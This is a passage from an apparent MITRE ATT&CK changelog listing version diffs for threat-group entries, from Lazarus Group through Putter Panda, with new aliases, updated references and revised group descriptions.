description[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.24.0
x_mitre_contributors[1]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesDiamond Sleet
external_references{'source_name': 'Diamond Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0065] Leviathan

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:15:51.198000+00:002024-01-08 20:33:16.460000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGingham Typhoon
external_references{'source_name': 'Gingham Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0030] Lotus Blossom

Current version: 3.0

Version changed from: 2.0 → 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-03-25 14:17:43.218000+00:002024-01-08 21:58:31.089000+00:00
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesRADIUM
aliasesRaspberry Typhoon
external_references{'source_name': 'RADIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Raspberry Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0059] Magic Hound

Current version: 6.0

Version changed from: 5.2 → 6.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-11 20:43:14.739000+00:002024-01-08 21:54:31.501000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version5.26.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesMint Sandstorm
external_references{'source_name': 'Mint Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1009] Moses Staff

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 18:50:12.653000+00:002024-04-11 00:39:25.190000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesDEV-0500
aliasesMarigold Sandstorm
external_references{'source_name': 'DEV-0500', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Marigold Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0069] MuddyWater

Current version: 5.0

Version changed from: 4.1 → 5.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 04:59:16.032000+00:002024-04-17 16:48:06.958000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version4.15.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesMango Sandstorm
aliasesTA450
external_references{'source_name': 'Mango Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'TA450', 'description': '(Citation: Proofpoint TA450 Phishing March 2024)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Proofpoint TA450 Phishing March 2024', 'description': 'Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign'}

[G0049] OilRig

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. The group works on behalf of the Iranian government 
>he Iranian government based on infrastructure details that c>based on infrastructure details that contain references to I
>ontain references to Iran, use of Iranian infrastructure, an>ran, use of Iranian infrastructure, and targeting that align
>d targeting that aligns with nation-state interests.(Citatio>s with nation-state interests.(Citation: FireEye APT34 Dec 2
>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja>017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearS
>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo >ky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Cit
>Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)>ation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Pl
>(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGE>aybook 2023)(Citation: Unit 42 QUADAGENT July 2018)
>NT July 2018) 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-02-06 20:58:52.317000+00:002024-04-11 16:06:34.698000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.14.0
x_mitre_contributors[2]Dragos Threat IntelligenceDragos Threat Intelligence
iterable_item_added
STIX FieldOld valueNew Value
aliasesHazel Sandstorm
aliasesEUROPIUM
external_references{'source_name': 'Hazel Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'EUROPIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0071] Orangeworm

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Orangeworm](https://attack.mitre.org/groups/G0071) is a grot1[Orangeworm](https://attack.mitre.org/groups/G0071) is a gro
>up that has targeted organizations in the healthcare sector >up that has targeted organizations in the healthcare sector 
>in the United States, Europe, and Asia since at least 2015, >in the United States, Europe, and Asia since at least 2015, 
>likely for the purpose of corporate espionage.(Citation: Sym>likely for the purpose of corporate espionage.(Citation: Sym
>antec Orangeworm April 2018)>antec Orangeworm April 2018) Reverse engineering of [Kwampir
 >s](https://attack.mitre.org/software/S0236), directly associ
 >ated with [Orangeworm](https://attack.mitre.org/groups/G0071
 >) activity, indicates significant functional and development
 > overlaps with [Shamoon](https://attack.mitre.org/software/S
 >0140).(Citation: Cylera Kwampirs 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-26 22:29:09.327000+00:002024-04-10 21:33:28.444000+00:00
description[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018) Reverse engineering of [Kwampirs](https://attack.mitre.org/software/S0236), directly associated with [Orangeworm](https://attack.mitre.org/groups/G0071) activity, indicates significant functional and development overlaps with [Shamoon](https://attack.mitre.org/software/S0140).(Citation: Cylera Kwampirs 2022)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[G1005] POLONIUM

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-10 12:31:10.192000+00:002024-01-08 21:56:22.594000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPlaid Rain
external_references{'source_name': 'Plaid Rain', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-06 14:13:06.011000+00:002024-04-06 19:05:38.712000+00:00
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSeashell Blizzard
aliasesFROZENBARENTS
external_references{'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references{'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Leonard TAG 2023', 'description': 'Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.', 'url': 'https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1015] Scattered Spider

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Scattered Spider](https://attack.mitre.org/groups/G1015) ist1[Scattered Spider](https://attack.mitre.org/groups/G1015) is
> a cybercriminal group that has been active since at least 2> a native English-speaking cybercriminal group that has been
>022 targeting customer relationship management and business-> active since at least 2022.(Citation: CrowdStrike Scattered
>process outsourcing (BPO) firms as well as  telecommunicatio> Spider Profile)(Citation: MSTIC Octo Tempest Operations Oct
>ns and technology companies. During campaigns [Scattered Spi>ober 2023) The group initially targeted customer relationshi
>der](https://attack.mitre.org/groups/G1015) has leveraged ta>p management and business-process outsourcing (BPO) firms as
>rgeted social-engineering techniques and attempted to bypass> well as telecommunications and technology companies. Beginn
> popular endpoint security tools.(Citation: CrowdStrike Scat>ing in 2023, [Scattered Spider](https://attack.mitre.org/gro
>tered Spider Profile)(Citation: CrowdStrike Scattered Spider>ups/G1015) expanded its operations to compromise victims in 
> BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaig>the gaming, hospitality, retail, MSP, manufacturing, and fin
>n December 2022)>ancial sectors.(Citation: MSTIC Octo Tempest Operations Octo
 >ber 2023) During campaigns, [Scattered Spider](https://attac
 >k.mitre.org/groups/G1015) has leveraged targeted social-engi
 >neering techniques, attempted to bypass popular endpoint sec
 >urity tools, and more recently, deployed ransomware for fina
 >ncial gain.(Citation: CISA Scattered Spider Advisory Novembe
 >r 2023)(Citation: CrowdStrike Scattered Spider BYOVD January
 > 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citat
 >ion: MSTIC Octo Tempest Operations October 2023)(Citation: C
 >rowdstrike TELCO BPO Campaign December 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-22 18:36:55.117000+00:002024-04-04 21:24:48.602000+00:00
description[Scattered Spider](https://attack.mitre.org/groups/G1015) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.(Citation: CrowdStrike Scattered Spider Profile)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)[Scattered Spider](https://attack.mitre.org/groups/G1015) is a native English-speaking cybercriminal group that has been active since at least 2022.(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023) The group initially targeted customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. Beginning in 2023, [Scattered Spider](https://attack.mitre.org/groups/G1015) expanded its operations to compromise victims in the gaming, hospitality, retail, MSP, manufacturing, and financial sectors.(Citation: MSTIC Octo Tempest Operations October 2023) During campaigns, [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques, attempted to bypass popular endpoint security tools, and more recently, deployed ransomware for financial gain.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: CrowdStrike Scattered Spider Profile)(Citation: MSTIC Octo Tempest Operations October 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesOcto Tempest
aliasesStorm-0875
external_references{'source_name': 'Octo Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Storm-0875', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'CISA Scattered Spider Advisory November 2023', 'description': 'CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'MSTIC Octo Tempest Operations October 2023', 'description': 'Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/'}
x_mitre_domainsmobile-attack

[G0092] TA505

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 05:38:20.381000+00:002024-04-10 22:37:02.592000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSpandex Tempest
aliasesCHIMBORAZO
external_references{'source_name': 'Spandex Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'CHIMBORAZO', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0010] Turla

Current version: 5.0

Version changed from: 4.0 → 5.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-02 19:48:08.774000+00:002024-04-17 22:12:21.483000+00:00
external_references[1]['source_name']BelugasturgeonBELUGASTURGEON
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version4.05.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSecret Blizzard
aliasesBELUGASTURGEON
external_references{'source_name': 'Secret Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
iterable_item_removed
STIX FieldOld valueNew Value
aliasesBelugasturgeon

[G0102] Wizard Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-12 14:35:52.920000+00:002024-04-03 20:21:34.872000+00:00
external_references[7]['description'](Citation: Secureworks Gold Blackburn Mar 2022)(Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesDEV-0193
external_references{'source_name': 'DEV-0193', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0128] ZIRCONIUM

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 22:10:43.732000+00:002024-01-08 22:16:18.643000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesViolet Typhoon
external_references{'source_name': 'Violet Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0045] menuPass

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:06:31.019000+00:002024-04-11 00:47:44.925000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesBRONZE RIVERSIDE
external_references{'source_name': 'BRONZE RIVERSIDE', 'description': '(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)'}
external_references{'source_name': 'SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022', 'description': 'Counter Threat Unit Research Team . (2022, June 23). BRONZE STARLIGHT RANSOMWARE OPERATIONS USE HUI LOADER. Retrieved December 7, 2023.', 'url': 'https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader'}
Minor Version Changes

[G0026] APT18

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:46:16.853000+00:002024-04-11 03:03:44.056000+00:00
x_mitre_version2.12.2

[G0073] APT19

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-21 20:44:02.443000+00:002024-04-11 03:03:02.576000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6

[G0087] APT39

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-02 18:03:29.024000+00:002024-04-11 02:59:52.392000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.13.2

[G1002] BITTER

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[BITTER](https://attack.mitre.org/groups/G1002) is a suspectt1[BITTER](https://attack.mitre.org/groups/G1002) is a suspect
>ed South Asian cyber espionage threat group that has been ac>ed South Asian cyber espionage threat group that has been ac
>tive since at least 2013. [BITTER](https://attack.mitre.org/>tive since at least 2013. [BITTER](https://attack.mitre.org/
>groups/G1002) has primarily targeted government, energy, and>groups/G1002) has targeted government, energy, and engineeri
> engineering organizations in Pakistan, China, Bangladesh, a>ng organizations in Pakistan, China, Bangladesh, and Saudi A
>nd Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May>rabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Cit
> 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)>ation: Forcepoint BITTER Pakistan Oct 2016)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-01 21:20:18.113000+00:002024-04-11 02:52:27.131000+00:00
description[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_domainsmobile-attack

[G0108] Blue Mockingbird

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:46:13.007000+00:002024-04-11 02:50:01.851000+00:00
x_mitre_version1.11.2

[G0070] Dark Caracal

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-11 19:08:18.503000+00:002024-04-11 02:42:07.325000+00:00
x_mitre_version1.31.4

[G0066] Elderwood

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-03-02 22:40:11.097000+00:002024-04-11 02:36:24.044000+00:00
x_mitre_version1.21.3

[G0043] Group5

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:07:39.812000+00:002024-04-11 02:23:59.598000+00:00
x_mitre_version1.21.3

[G1001] HEXANE

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 04:43:59.082000+00:002024-02-09 19:27:00.371000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[G0126] Higaisa

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 02:12:43.892000+00:002024-04-11 02:19:20.934000+00:00
x_mitre_version1.01.1

[G0100] Inception

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 23:21:06.480000+00:002024-04-11 02:15:23.096000+00:00
x_mitre_version1.11.2

[G1013] Metador

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-14 12:25:35.434000+00:002024-04-11 00:46:59.526000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[G0103] Mofang

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-29 03:30:39.739000+00:002024-04-11 00:41:37.453000+00:00
x_mitre_version1.01.1

[G0021] Molerats

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 20:16:16.057000+00:002024-04-11 00:40:46.966000+00:00
x_mitre_version2.02.1

[G0056] PROMETHIUM

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 18:12:48.893000+00:002024-04-19 19:35:15.637000+00:00
x_mitre_version2.02.1

[G0024] Putter Panda

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 19:15:04.771000+00:002024-04-11 00:24:27.983000+00:00
